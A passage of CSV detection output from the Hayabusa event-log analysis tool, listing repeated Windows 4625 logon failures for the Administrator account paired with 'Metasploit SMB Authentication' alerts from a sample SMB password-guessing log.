Password,User: Administrator : Type: 3 : Workstation: RmyF6j61wosCE0sg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fd61fJBRizl2AIGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDIFX7lsmGqSGvkA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UVmto6S25gU2bkwa : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7QMbzSuGuzzMK0v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJUynF5bN1Oj0vaP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dg4ZtybY5BnPN0nX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gRmRV9ct3hor8Muk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QRjaP1mj9FgKsGBE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3CCzzatQ195mcxQ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: QJPIrtk5GBAhsUlR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 720RHwyXQcxvsJBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GofmHRstuhljMDOL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wQUQ4INktwXwRkaY : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8WHs5hduf7SmUcLK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gdo1txjJXiRLbUDH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JK8jP3ftKQOyutGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdbEjo88dBJRhrKp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZCVkXkwhbuSM654 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z2mc9WScfBa88rtO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: Lee7qYLkXQoz8rRh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f5g1ZKpZuZU1WRoC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h4ST7RrHJxAQHHbn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GtW1hBHF97YqvN4N : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVKlPytPofO9LQBm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.189 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GOkZ9yjvfL51UYXo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fAxfxSbRqGO7Dej0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D7XmvDYk6zFLir09 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mWcl6CKdSMxd8edZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SxBQlFZvGBqDdobn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: AXN94VanwME6q8rc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOj7CZ3stJXePY8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXjmqxguFGL3f8cV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHWmdxnRrMbxrdlN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ROBnjuyHn4FRugk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zGxuUxasL680O21l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.754 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CYoM984EzAkUtBoa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0e3ATNpzeeAf6Qax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1A0dGhpVy8kgiRP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGgNAKJM5RAt9B5K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: c3DpedXujvQpZnjQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BsaSjESaUHbsIxJL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ca4dlxyEco3VOapw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Z6lJc7DXAOcNZ2G : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Olt5mS7na07VDJE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oCFeQcUMDTs0ev8v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FYmH6CQrizoZ1DAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.233 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
